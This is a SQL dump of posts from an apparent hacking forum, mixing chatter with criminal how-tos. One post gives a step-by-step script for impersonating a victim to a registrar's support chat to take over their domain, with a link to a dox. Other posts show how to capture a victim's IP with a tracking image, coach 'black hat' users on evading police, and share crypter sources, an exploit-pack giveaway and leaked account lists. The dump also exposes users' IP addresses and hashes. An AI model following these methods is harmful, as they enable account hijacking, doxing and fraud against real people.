INTO mybb_posts VALUES('563', '152', '489', '30', 'RE: [Free] Magic Traffic Bot! [Worth $29.99]', '0', '54', 'Sin Cara', '1345559898', '[quote=\'iTzIpod\' pid=\'489\' dateline=\'1345520696\']\r\nHere\'s a virus scan for you OP! [url=https://www.virustotal.com/file/866c980f6001ff281d90974977c24a209d058bb506fe542a3c6ec5b6b9946660/analysis/1345520468/] Virus Scan[/url]\r\n\r\n\r\nYou\'re welcome.\r\n[/quote]\r\n\r\nThanks dude for virus scan ;)', '119.154.75.152', '2006600600', '1', '0', '0', '0', '1', 'fe20aa1ea37cad5b1703a5b00c66e3e3', '0', '0'); INSERT INTO mybb_posts VALUES('564', '139', '536', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '54', 'Sin Cara', '1345559956', '[quote=\'iTzIpod\' pid=\'536\' dateline=\'1345556489\']\r\nWhen I try to go on \r\nhttp://skype.hotspotshield.com/banner.php\r\nI get this message saying Temporarily Unavailable! :/\r\n[/quote]\r\n\r\nDon\'t worry..... Just wait ;)', '119.154.75.152', '2006600600', '1', '0', '0', '0', '1', 'caa45c2dcb082a941cc6b83b1ab783f5', '0', '0'); INSERT INTO mybb_posts VALUES('565', '16', '42', '11', 'RE: Is Hacking legal or illegal?', '0', '82', 'iTzIpod', '1345560022', 'Hacking is illegal.... I just lost my train of thought. I forgot what I was going to say..\nMeh just in general, Hacking is illegal. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b128dfa111011ca2ab34aa177b7f5a56', '0', '0'); INSERT INTO mybb_posts VALUES('566', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '82', 'iTzIpod', '1345560297', 'ROFL @Baws. \n\nOT: I didn\'t know that! :o Thanks for the warning.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3c6655d13503d7a2a2b295b00861a54f', '0', '0'); INSERT INTO mybb_posts VALUES('567', '160', '462', '9', 'RE: $$$Sh@recash Moneymaking$$$', '0', '53', 'sirchamp', '1345562585', 'Yeah I fixed it. Just copy the adf.ly url into the link box and press enter. Then it should work.\nIt works for me. If it still doesnt work I\'ll just write the direct mediafire link.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '1cb18f5f9986b579ce130695f1e3e7a0', '0', '0'); INSERT INTO mybb_posts VALUES('568', '173', '0', '14', '[TUT] Staying Anonymous', '0', '54', 'Sin Cara', '1345562972', '[size=x-large][b][color=#1E90FF]Guide to staying anonymous[/color]\r\n[/b][/size]\r\n[IMG]http://i46.tinypic.com/142czsx.png[/IMG]\r\n\r\n[color=#FFD700][size=medium][b]#1 Mind Set[/b][/size][/color]\r\n\r\nIf your a black hat hacker like me, your #1 priority should be to stay anonymous. Now there are many ways of staying anonymous but making it your #1 priority should be your main choice, if it\'s not make it that way.\r\n\r\n\r\n[size=medium][color=#FFD700][b]VPN\'s[/b][/color][/size]\r\n\r\nVPN\'s are very resourceful when hacking, they can save you in an instant. VPN\'s are pretty much information encrypters. VPN stands for Virtual Private Network. \r\n\r\nList Of Free VPN\'s \r\n\r\n\r\nSecurityKIS http://www.securitykiss.com/sk/index.php\r\nFree VPN http://thefreevpn.com/\r\nproXPN http://proxpn.com/\r\nUSA IP http://www.usaip.eu/en/free_vpn.php\r\nOpen VPN http://openvpn.net/\r\nIts Hidden http://itshidden.com/\r\nCyberghost http://cyberghostvpn.com/ --> Good for germany\r\nHotspot Shield http://anchorfree.com/downloads/hotspot-shield/\r\nVPN Tool http://www.vpntool.com/services.php --> good US\r\nTor VPN https://torvpn.com/information.html\r\n\r\n[color=#FFD700][size=medium][b]Proxies[/b][/size][/color]\r\n\r\nProxies are also very useful. Lot\'s of hackers use proxies. Using proxy websites it bypasses your isp, when you type into the proxy it automatically hides your IP Address being logged onto the website your on. Be aware proxies do not last forever.\r\n\r\nList of Proxies\r\n\r\nhttp://www.hidemyass.com/\r\nhttp://newipnow.com/\r\nhttp://proxy6.org/\r\nhttp://www.proxeasy.com/webclient.aspx\r\nhttp://proxify.com/\r\nhttp://unblocked.in/\r\nhttp://www.safersurfing.net/\r\nhttp://hidefromyou.com/\r\nhttp://www.httpsurf.com/\r\n\r\n\r\n[color=#FFA500][size=medium][b]Virtual Machines[/b][/size][/color]\r\n\r\nThis a very safe way to hack. No one can fuck up your computer either if your using a VM. Virtual Machines are pretty much computers on your desktop. Its an emulation. Make sure your VM has a password on it as well. \r\n\r\nList of VM\'s \r\n\r\nVMWare - https://my.vmware.com/web/vmware/downloads\r\n\r\nVirtual Box - https://www.virtualbox.org/wiki/Downloads\r\n\r\nVMLite - http://www.vmlite.com/index.php?option=com_rokdownloads&view=folder&Itemid=153\r\n\r\n\r\n[color=#FFA500][size=medium][b]Be Careful With Your DOX Info[/b][/size][/color]\r\n\r\nOnce you\'ve started hacking it would be great if you didnt put your real information on anything anymore. You should make it very hard for someone to get information about you, make it hard for someone to DOX you. I suggest using the website down below.\r\n\r\nFake Name Generator - http://www.fakenamegenerator.com/\r\n\r\nIt\'s a website that generates a whole profile of information from name, address, phone number, email address, company, country, and even occupation. It generates alot, so I suggest using that.\r\n\r\n\r\n[color=#FFD700][size=medium][b]Stay Safe[/b][/size][/color]\r\n\r\nThese are a few methods to staying anonymous. Although these methods are powerful you can never be to sure, these methods are not 100% so don\'t get mad if you get caught. With the cops you have to make the right moves at the right time to not get caught so stay safe.\r\n\r\n[color=#FFA500]Credits to[/color] : [b]w0rm.exe[/b]', '119.154.75.152', '2006600600', '1', '0', '0', '0', '1', '5205fc4f131aec5807f877e0230a3716', '0', '0'); INSERT INTO mybb_posts VALUES('569', '168', '507', '50', 'RE: :(', '0', '20', 'JakeUS', '1345569039', 'Thread closed.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'e8854b965537351cad7297bc5c49879c', '0', '0'); INSERT INTO mybb_posts VALUES('570', '161', '469', '3', 'RE: Congratz NXK', '0', '61', 'NXK', '1345576192', 'Thank you, And I do not plan on abusing my position. Make sure you follow rules and everything should be just fine :)', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '27b3a4fe18ecf3eb7877b7ca2b225540', '0', '0'); INSERT INTO mybb_posts VALUES('571', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '2', 'Apathy', '1345582636', 'hit me up with this pack.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '2deec8cf199636eaf6b123e634a5c4bf', '0', '0'); INSERT INTO mybb_posts VALUES('572', '167', '554', '4', 'RE: iTzIpod is here (:', '0', '1', 't3h jok3r', '1345586993', '[quote=\'iTzIpod\' pid=\'554\' dateline=\'1345558818\']\r\n@Timmy, thanks for the welcome. But please call my Jacob :p\r\n\r\nAlso @t3h jok3r, thanks for the welcome. Also, LOL why don\'t you got a PSN ID? :/\r\n[/quote]\r\n\r\nIt\'s just I don\'t want to get hacked ;)\r\n\r\nI also don\'t get much time so play alone at the night. f', '41.174.15.250', '699273210', '1', '0', '0', '0', '1', '0b83fdaa9bd822affb025e2a9606e35d', '0', '0'); INSERT INTO mybb_posts VALUES('573', '161', '469', '3', 'RE: Congratz NXK', '0', '1', 't3h jok3r', '1345588189', 'Hopefully, you don\'t abuse them. So far you haven\'t and I believe this guy will once become an Admin.', '41.174.15.250', '699273210', '1', '0', '0', '0', '1', 'f364edbefed5c2670074963c78a71035', '0', '0'); INSERT INTO mybb_posts VALUES('574', '151', '399', '24', 'RE: Windows 8/Ubuntu/Android Themes For XP, Vista, Win7 x32 & x64', '0', '61', 'NXK', '1345589085', 'Nice themes, I\'m going to use it', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '7b0df3c5c53265691cad494e40833f2f', '0', '0'); INSERT INTO mybb_posts VALUES('575', '161', '573', '3', 'RE: Congratz NXK', '0', '61', 'NXK', '1345589159', '[quote=\'t3h jok3r\' pid=\'573\' dateline=\'1345588189\']\r\nHopefully, you don\'t abuse them. So far you haven\'t and I believe this guy will once become an Admin.\r\n[/quote]\r\n\r\nI hope I can prove my loyalty to you. That day of becoming an admin is far away hopefully. I want to make sure I actually work for it and earn it.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '8ac843d2d24e9524370f51cf23d1546e', '0', '0'); INSERT INTO mybb_posts VALUES('576', '174', '0', '3', 'Coders Group Released', '0', '1', 't3h jok3r', '1345589672', 'A couple of days ago a new group was made on L33T Hacking called [b]Coders[/b].\r\n\r\nI don\'t know why I didn\'t announce it and why I didn\'t allow people to set it as their default group. I guess I forgot about it, anyways you can now join the [b]Coders[/b] group via UserCP and if you are part of more than 1 group then you can view all the usergroups a member is part of on the their profile.\r\n\r\nExample of all usergroups\r\nhttp://l33thacking.com/member.php?action=profile&uid=61\r\n\r\nThe Leader of the Coders group is [i][b]HoverCatz[/b][/i]\r\n\r\n[b]Userbar[/b]\r\n\r\n[img]https://dl.dropbox.com/u/33062220/Coders.png[/img]\r\n\r\n[b]Description:[/b] The coders group is a group dedicated to the coding section, they help people learn also code programs and many other kinds of products.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '4ebf62d1c6ecb606579a2299e4015804', '0', '0'); INSERT INTO mybb_posts VALUES('577', '59', '561', '42', 'RE: 13 year old visits jail for hacking', '0', '1', 't3h jok3r', '1345590490', '[quote=\'iTzIpod\' pid=\'561\' dateline=\'1345559517\']\r\n[quote=\'spacefish36\' pid=\'540\' dateline=\'1345556778\']\r\n[quote=\'iTzIpod\' pid=\'522\' dateline=\'1345554867\']\r\nOMG I remember that show. It was like the best :p\r\nOT: It is a program. And it is a good thing he stopped.\r\n[/quote]\r\n\r\nWhat program are you talking about?\r\n[/quote]\r\n\r\nBeyond Scared Straight is a program that tries to convince the kids not to do the wrong things. And tries to make them change the path they are walking in.\r\nI don\'t know how to explain it. But if you watch the show, then you would notice it.\r\n[/quote]\r\n\r\n:roflol:\r\n\r\nMy bad, I don\'t know what I was up to this morning, when you said it\'s a program I thought you said a computing program.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '4facb42010c907393a7c255b864f150c', '0', '0'); INSERT INTO mybb_posts VALUES('578', '51', '133', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '1', 't3h jok3r', '1345590605', 'No problem. Enjoy and Good Luck. There are still a lot of web secrets left to be exposed.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '99b77fc46452a59aa0735c9237c01706', '0', '0'); INSERT INTO mybb_posts VALUES('579', '175', '0', '42', 'Is Apple really the most valuable company?', '0', '1', 't3h jok3r', '1345590755', 'Go to any tech aggregator right now and you’ll see headlines loudly proclaiming Apple to be the most valuable publicly traded company ever.\r\n\r\nThe Cupertino-based giant’s stock today reached US$660.73, giving it a market capitalisation US$619.37-billion. That means it slunk past the US$618.89-billion capitalisation Microsoft hit in 1999, which many believe to be the previous record. That makes it the most valuable publicly listed company in history. Except it doesn’t.\r\n\r\nIn today’s money, Microsoft’s 1999 valuation is actually worth US$850-billion. Then again, the Redmond-based giant’s market cap today is only around US$257-billion. Yes we’re still dealing with massive numbers, but it effectively means that the company has lost three-quarters of it market cap over the last 13 years.\r\n\r\nRead more: http://za.news.yahoo.com/apple-really-most-valuable-company-ever-195640282.html', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '1c086e935c4ce0d02f112ac32c8e7df5', '0', '0'); INSERT INTO mybb_posts VALUES('580', '174', '576', '3', 'RE: Coders Group Released', '0', '2', 'Apathy', '1345590892', 'Cool nice idea.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', 'f255243d7047e7cff76988c0f9035dfb', '0', '0'); INSERT INTO mybb_posts VALUES('581', '173', '568', '14', 'RE: [TUT] Staying Anonymous', '0', '1', 't3h jok3r', '1345591474', 'Nice Tutorial. Stickied currently in the VPNs section so people with anonymity concerns can check this thread out.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '7706112224cc1017a4c6ca5f157e5aae', '0', '0'); INSERT INTO mybb_posts VALUES('582', '139', '356', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '1', 't3h jok3r', '1345591864', 'Honestly, this tutorial was not made by virtualhacker. He just leeched it from Google and posted it on HF so I don\'t believe he should be given credits but thanks for providing credits even if they were wrong.\n\nThis thing still works I believe and anyone with the unavailable error, just wait few minutes and keep on checking.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', 'ba94711efb82292d509726a32b8c6f0a', '0', '0'); INSERT INTO mybb_posts VALUES('583', '150', '398', '12', 'RE: [TuT] Easiest Way To Portfoward (For RAT\'s)', '0', '4', 'Triple H', '1345592065', 'The only thing I avoid is PortForwarding because it\'s a complicated process for me, but you made it soooo easy in this tutorial.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '47e034dc0a42eb78c4de7bada78c6baf', '0', '0'); INSERT INTO mybb_posts VALUES('584', '149', '396', '12', 'RE: How to crack your Internet Download Manager forever', '0', '4', 'Triple H', '1345592116', 'I would give this a try, would you recommend doing a backup before doing this?', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '55a20430a8311f4fceba2c78a30352da', '0', '0'); INSERT INTO mybb_posts VALUES('585', '148', '395', '12', 'RE: [Tutorial]How to use Cookies and access Premium Accounts', '0', '10', 'swa4567', '1345592272', 'So basically it saves all cookies for logins on all the sites in the code via Browser?', '41.174.14.60', '699272764', '0', '0', '0', '0', '1', 'e04a3aece7e44a07e1751d078d0b4406', '0', '0'); INSERT INTO mybb_posts VALUES('586', '176', '0', '12', '[Tut]How trace an email', '0', '10', 'swa4567', '1345592325', '[b]Step 1 :[/b]\r\n\r\nOpen your mail service and open compose window,Set your Anonymous mail as To address,\r\nSet a Interesting Title because our method only works if he opens that mail,So it\'s up to you to decide Title.\r\n\r\n[b]Step 2: [/b]\r\n\r\nOpen another tab and go to [url=www.spypig.com/]Spypig[/url] website.\r\n\r\n[b]Step 3 :[/b]\r\n\r\nSelect one of the tracker images or upload one by yourself,I prefer the blank one to avoid detection,Fill out the information,\r\n\r\n[img]http://i.imgur.com/xwfwe.jpg[/img]\r\n\r\n[b]Step 4:[/b]\r\n\r\nAfter pressing Generate Button drag and drop that image to 1st tab which is ready to send to your slave mail,Send the mail (Please note that you must send that email within 1 minute since the Generate button is pressed).\r\n[img]http://i.imgur.com/MI8B8.jpg[/img]\r\n\r\n[b]Step 5: [/b]\r\n\r\nWait for this email to get read by the slave,You\'ll receive the Victims IP as soon as slave open that Tracker mail.\r\n\r\nStep 6:\r\n\r\nUse IP checker sites to find out information about that IP you got So thereby you can get information about the source of email :pirate:.\r\n\r\n[b][i]PM me if you want further help or have doubts.[/i][/b]\r\n\r\n[b]Notes[/b]\r\n\r\n[list]\r\n[*]Sometime mail providers hide images inside the mail,If then this method can\'t be done.\r\n[*]Make sure received IP is not proxyfied.\r\n[/list]', '41.174.14.60', '699272764', '0', '0', '0', '0', '1', '79616b5c29830fd304b3d2ae7fc4b241', '0', '0'); INSERT INTO mybb_posts VALUES('587', '177', '0', '12', '[tut]How to get the FBI login screen', '0', '10', 'swa4567', '1345592811', '[align=center]Found this tutorial in a notepad file stored in my computer and decided to share it.\n\n[color=#FFD700][b][size=large]Downloads[/size][/b][/color]\n[url=http://www.stardock.com/products/logonstudio/downloads.asp]Logon Studio[/url]\n[url=http://www.stardock.com/products/logonstudio/downloads.asp]FBI Files[/url]\n[url=http://www.wincustomize.com/explore/logonstudio_xp/9724/]WideScreen Computer FBI Files[/url]\n\n[size=large][color=#FFD700][b]Tutorial[/b][/color][/size]\n- Setup & run logon studio (Download above) \n- Click load on the side of the program\n- Select the FBI Logon screen (Download above)\n- Highlight it hit apply then restart your computer\n\n[size=large][color=#FFD700][b]Picture[/b][/color][/size]\n[img]http://i1209.photobucket.com/albums/cc390/Geneathon/FBI-access.jpg[/img]\nYou Can Get A FBI Logo, Search It On Google\n[/align]', '41.174.14.60', '699272764', '0', '0', '10', '1345592829', '1', '9c23280a0c76218eb715e9edfb51bff2', '0', '1345592829'); INSERT INTO mybb_posts VALUES('588', '178', '0', '16', 'Social Engineering Domain Companies', '0', '10', 'swa4567', '1345593910', '[b]Why SE Domain Companies?[/b]\n\nTo take over the domain or use the domain and redirect it to your deface page OR redirect it to your website for more views or earn more by redirecting it to adf.ly or similar sites. \n\n[b]Notes[/b]\n- I will be using something@fuck.com as a fake email\n- I will be using godaddy as the domain company\n\n[b]Requirements[/b]\n\n[list]\n[*] Email that is being used on the website\n[*] Name of the victim\n[*] Email that the victim uses for Payments\n[*] Must have a live chat option\n[*] Fake email\n[/list]\n\n[b]Step 1[/b]\nGo on their live chat option and provide the real name of the victim and your FAKE email, if they ask for the details before chat.\n\n[b]Step 2[/b]\n\nWhen they ask how may they help you, say \"Hi, How are you?\"\n\n[b]Step 3[/b]\n\nUse the reason below or a similar reason and continue to step 4\n\n[quote]\nI went to FAKE COUNTRY for a week for a vacation and when I came back from the holiday, I noticed that someone has hacked all my email accounts and I think my godaddy account has been compromised as well, because I\'m unable to login. I couldn\'t do a password reset because my email has been hacked as well. I would highly appreciate it, if you could help me out in retrieving my account. I need to regain access to my account ASAP before the hacker harms my members or my website\n[/quote]\n\n[b]Step 4[/b]\n\nThey will ask for the username, say you don\'t really remember because you always used your email or domain to login. [color=#FF0000][b]CHECK OUT THE LOGIN PAGE AND USE THE APPROPRIATE REASON!!! [/b][/color] If it\'s email, then say you have lost access to your email because it has been hacked!!!\n\n[b]Step 5[/b]\n\nThey might ask you some questions and most likely the security question, answer it wrong and say it is the correct one, please give it a another try. They will say it\'s wrong, say it\'s the correct answer maybe someone changed it. \n\n[b]Step 6[/b]\n\nI\'m sure they will ask for what email you used to make a Payment, then provide them with the email and say but I lost access to it as well because I don\'t know how but the hacker hacked all my accounts. \n\n[b]Step 7[/b] \n\nI guess now they will now ask for your new email. Provide them with the fake email and now you have successfully taken over the domain. \n\nThis is my personal method and I used this before to hack xhostfire hosting, I had a DOX so it was easy for me.\n\nLink to DOX: http://pastebin.com/eXVxALWX', '41.174.14.60', '699272764', '0', '0', '10', '1345593976', '1', '6ca4b4d1afbbdf33cf0903ad13b5dd6f', '0', '1345593976'); INSERT INTO mybb_posts VALUES('589', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '1', 't3h jok3r', '1345594547', 'I have no idea either, I guess hip hop is when it contains break dance because not all rap songs contain break dance.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '72eae727e46b0caf470e45c37bc9bb35', '0', '0'); INSERT INTO mybb_posts VALUES('590', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '1', 't3h jok3r', '1345594959', 'It sure is funny but useful as well. I fucked up many niggas with this tricks and I love it.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '2d7f0dac9a9a2cb39e248258477c3154', '0', '0'); INSERT INTO mybb_posts VALUES('591', '133', '339', '23', 'RE: Online Scanners list', '0', '61', 'NXK', '1345595162', 'Thank you very much for this.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '80fb7c526003af1988d2e35445a66e4f', '0', '0'); INSERT INTO mybb_posts VALUES('592', '157', '453', '15', 'RE: Eleonore Exp 1.2 Expliot pack', '0', '1', 't3h jok3r', '1345595227', 'How the fuck did such a great exploit get ignored?\n\nBTW, can you make this giveaway post here and PM me please? You can save the download link in your personal notepad.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '596d7fb129a1dbe0f34840a6c829ff82', '0', '0'); INSERT INTO mybb_posts VALUES('593', '179', '0', '34', '[tut] Multiple 3D text tutorials', '0', '1', 't3h jok3r', '1345595286', '[align=center][IMG]http://i.imgur.com/swu7N.png[/IMG][/align]\r\n\r\nHere is the long awaited NEW 3D text tutorial. This is fully explained including text commentary in notepad. It also contains NO keyboard short cuts. This means this tutorial IS user friendly.\r\n\r\n[color=#00BFFF][b]Here are some examples of what can be created:[/b][/color]\r\n\r\n[img]http://i.imgur.com/wd7m2.jpg[/img]\r\n[img]http://i.imgur.com/8djuQ.png[/img]\r\n[img]http://i.imgur.com/aQcIl.jpg[/img]\r\n\r\n[color=#FF1493]Download links: [/color]\r\n\r\n[url=http://rapidshare.com/#!download|865l36|441117250|__HOT___-_Gabber_s_NEW_3D_Text_Tutorial___HQ__.rar|29672][img]http://www.multiupload.com/logos/5.gif[/img][/url]\r\n\r\n[url=http://www.megaupload.com/?d=X469M79U][img]http://www.multiupload.com/logos/1.gif[/img][/url]\r\n\r\n[url=http://hotfile.com/dl/94712669/872779d/_HOT__-_Gabbers_NEW_3D_Text_Tutorial__HQ_.rar.html][img]http://www.multiupload.com/logos/9.gif[/img][/url]\r\n\r\n[url=http://www.zshare.net/download/84837132e2d3ed1f/][img]http://www.multiupload.com/logos/6.gif[/img][/url]\r\n\r\n[url=http://uploading.com/files/mbf83c5b/%255B%2BHOT%2B%255D%2B-%2BGabber%2527s%2BNEW%2B3D%2BText%2BTutorial%2B%255B%2BHQ%2B%255D.rar/][img]http://www.multiupload.com/logos/10.gif[/img][/url]\r\n\r\n[url=http://depositfiles.com/en/files/v7rup39zx][img]http://www.multiupload.com/logos/7.gif[/img][/url]\r\n\r\n[b][color=#98FB98]Click on the download mirror image to download![/color][/b]\r\n\r\n[hr][hr][hr][hr][hr][hr]\r\n\r\n[b][color=#FF0000][size=x-large]This tutorial took:[/size][/color][/b]\r\n[size=medium]\r\n[b][color=#FFD700]::[/color][/b] 40 minutes to compile and make.\r\n[b][color=#FFD700]::[/color][/b] 20 minutes to repair the .avi file.\r\n[b][color=#FFD700]::[/color][/b] 10 minutes to get it uploaded.\r\n[b][color=#FFD700]::[/color][/b] 20 minutes to make the thread.[/size]\r\n\r\n[b][color=#FF0000][size=large]It only takes 5 seconds to say thank you![/size][/color][/b]', '41.174.14.60', '699272764', '1', '0', '1', '1345595321', '1', 'db770335387098cbd01f207525ee35ca', '0', '1345595321'); INSERT INTO mybb_posts VALUES('594', '157', '592', '15', 'RE: Eleonore Exp 1.2 Expliot pack', '0', '61', 'NXK', '1345595317', '[quote=\'t3h jok3r\' pid=\'592\' dateline=\'1345595227\']\r\nHow the fuck did such a great exploit get ignored?\r\n\r\nBTW, can you make this giveaway post here and PM me please? You can save the download link in your personal notepad.\r\n[/quote]\r\nDone\r\n\r\nI guess Just post here and PM me for this :)!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'f80465c111b6509234da50da8c52b395', '0', '0'); INSERT INTO mybb_posts VALUES('595', '180', '0', '20', '[Free]Saddam\'s Crypter VB.Net source and +19 more![No surveys]', '0', '17', 'khade009', '1345595411', 'I now got many crypter sources, and i decided to share it here.\r\nDownload links:\r\n\r\nYou can download Saddam\'s crypter source here:\r\nhttp://adf.ly/C5jUD\r\nPassword can be found at dl page.\r\nAnd if you want to get 19 more, download the pack here:\r\nhttp://cur.lv/2xdj\r\n\r\nC#,C++,VB6,VB2010 download:\r\nVISUAL BASIC 2010 EXPRESS: http://www.microsoft.com/visualstudio/en...ic-express\r\nVISUAL C# 2010 EXPRESS: http://www.microsoft.com/visualstudio/en...rp-express\r\nVISUAL C++ 2010 EXPRESS: http://www.microsoft.com/visualstudio/en...pp-express\r\nVisual Basic 6.0: http://www.microsoft.com/download/en/con...x?id=20429\r\nI hope it helps.', '41.174.14.60', '699272764', '0', '0', '0', '0', '1', '8acf03b98c11009cce3464d6968defc1', '0', '0'); INSERT INTO mybb_posts VALUES('596', '157', '453', '15', 'RE: Eleonore Exp 1.2 Expliot pack', '0', '1', 't3h jok3r', '1345595502', 'OK, that was too slow. Lol JK.\n\nThanks, I think just post here would be OK because some people require 10 posts in order to PM.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', 'dac945ab4ae30a58887011d4ed93ea89', '0', '0'); INSERT INTO mybb_posts VALUES('597', '167', '572', '4', 'RE: iTzIpod is here (:', '0', '82', 'iTzIpod', '1345595552', '[quote=\'t3h jok3r\' pid=\'572\' dateline=\'1345586993\']\r\n[quote=\'iTzIpod\' pid=\'554\' dateline=\'1345558818\']\r\n@Timmy, thanks for the welcome. But please call my Jacob :p\r\n\r\nAlso @t3h jok3r, thanks for the welcome. Also, LOL why don\'t you got a PSN ID? :/\r\n[/quote]\r\n\r\nIt\'s just I don\'t want to get hacked ;)\r\n\r\nI also don\'t get much time so play alone at the night. f\r\n[/quote]\r\n\r\nSmart thinking.. :p\r\n\r\nSpeaking of getting hacked. I hacked a guy on PSN. :p I made a phisher and he was my first victim.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '49f71f6220199eb367e309c34bb5f641', '0', '0'); INSERT INTO mybb_posts VALUES('598', '174', '576', '3', 'RE: Coders Group Released', '0', '82', 'iTzIpod', '1345595734', 'Alright. Thanks for the heads up. =]\nI would love to join but I don\'t got any Coding Knowledge/Experience. :/', '24.212.197.164', '416597412', '1', '0', '82', '1345596488', '1', '65cfb04f601d4afea090895caeaeebb6', '0', '1345596488'); INSERT INTO mybb_posts VALUES('599', '59', '577', '42', 'RE: 13 year old visits jail for hacking', '0', '82', 'iTzIpod', '1345595833', '[quote=\'t3h jok3r\' pid=\'577\' dateline=\'1345590490\']\r\n[quote=\'iTzIpod\' pid=\'561\' dateline=\'1345559517\']\r\n[quote=\'spacefish36\' pid=\'540\' dateline=\'1345556778\']\r\n[quote=\'iTzIpod\' pid=\'522\' dateline=\'1345554867\']\r\nOMG I remember that show. It was like the best :p\r\nOT: It is a program. And it is a good thing he stopped.\r\n[/quote]\r\n\r\nWhat program are you talking about?\r\n[/quote]\r\n\r\nBeyond Scared Straight is a program that tries to convince the kids not to do the wrong things. And tries to make them change the path they are walking in.\r\nI don\'t know how to explain it. But if you watch the show, then you would notice it.\r\n[/quote]\r\n\r\n:roflol:\r\n\r\nMy bad, I don\'t know what I was up to this morning, when you said it\'s a program I thought you said a computing program.\r\n[/quote]\r\n\r\nLOL! Sorry I guess I wasn\'t specific enough :/\r\n:thinking:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '00963ed7d3530544f170c8ec24bfe0c2', '0', '0'); INSERT INTO mybb_posts VALUES('600', '175', '579', '42', 'RE: Is Apple really the most valuable company?', '0', '82', 'iTzIpod', '1345595912', 'I\'m an Apple fan :p\nIf you see in my name, it says \"Ipod\" =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '38138c1019f9ba06f4b429643774bc31', '0', '0'); INSERT INTO mybb_posts VALUES('601', '79', '590', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '82', 'iTzIpod', '1345596058', '[quote=\'t3h jok3r\' pid=\'590\' dateline=\'1345594959\']\r\nIt sure is funny but useful as well. I fucked up many niggas with this tricks and I love it.\r\n[/quote]\r\n\r\nI would do it if I hate someone. But like I said earlier I don\'t hate anyone so... :whistle:\r\n\r\n\r\nAnd I might not got the guts to do so.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '59b184db759782665062e6ca9c639ddd', '0', '0'); INSERT INTO mybb_posts VALUES('602', '171', '589', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1345596178', '[quote=\'t3h jok3r\' pid=\'589\' dateline=\'1345594547\']\r\nI have no idea either, I guess hip hop is when it contains break dance because not all rap songs contain break dance.\r\n[/quote]\r\n\r\nYou\'re right about the rap part. I just noticed that :p\r\n\r\nI will find it very hard for someone to Breakdance to Drake :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7ae10705a927e45c79eda21b3050b3ab', '0', '0'); INSERT INTO mybb_posts VALUES('603', '160', '462', '9', 'RE: $$$Sh@recash Moneymaking$$$', '0', '82', 'iTzIpod', '1345596282', 'It still doesn\'t work. I can\'t click on the link.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fc2e403087067ff7b9aa6a0113b280fc', '0', '0'); INSERT INTO mybb_posts VALUES('604', '174', '576', '3', 'RE: Coders Group Released', '0', '20', 'JakeUS', '1345596349', 'I won\'t be joining since I know nothing about coding.\n\nHow much do groups cost now?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '39b368500375bcf7b12ea0a9042660ab', '0', '0'); INSERT INTO mybb_posts VALUES('605', '181', '0', '54', 'Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '1', 't3h jok3r', '1345596736', 'Brazzers :\r\nHere : http://www.restfile.net/q9y7sq7rp0bu/brazzzers.txt.html\r\n\r\nXhamster :\r\nHere : http://www.restfile.net/bp2svhmp2ry2/xhamster.txt.html\r\n\r\nGfrevenge :\r\nHere : http://www.restfile.net/s86apm58tp4y/gfrevenge.txt.html\r\n\r\nMofos : \r\nHere : http://www.restfile.net/w60t1bmez1sx/mofoss.txt.html\r\n\r\nYoujizz :\r\nHere : http://www.restfile.net/t2e0w8qybczf/youjizzz.txt.html\r\n\r\nLivejasmin :\r\nHere : http://www.restfile.net/mhob4dp1h9c0/Liv...n.txt.html', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', 'cdc7bca81d77bfcc2dbed80e1dcd55e3', '0', '0'); INSERT INTO mybb_posts VALUES('606', '165', '492', '5', 'RE: Just did something', '0', '20', 'JakeUS', '1345597060', 'Just posted a new thread advertising this one.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '5a3a1219e357a751c2afc3c864d9c09f', '0', '0'); INSERT INTO mybb_posts VALUES('607', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1345597357', 'Thanks for your feedbacks. I\'m glad that many people are liking their upgrades. Just to let you guys know, that you guys can now self-close threads.', '41.174.23.122', '699275130', '1', '0', '0', '0', '1', '59f4b60b6d9e82445521d190940c00af', '0', '0'); INSERT INTO mybb_posts VALUES('608', '174', '576', '3', 'RE: Coders Group Released', '0', '1', 't3h jok3r', '1345597536', 'For all join requests etc, please contact HoverCatz.\n\nGroups are free, you would just need to request one. I keep on forgetting on adding a groups forum, but hopefully it 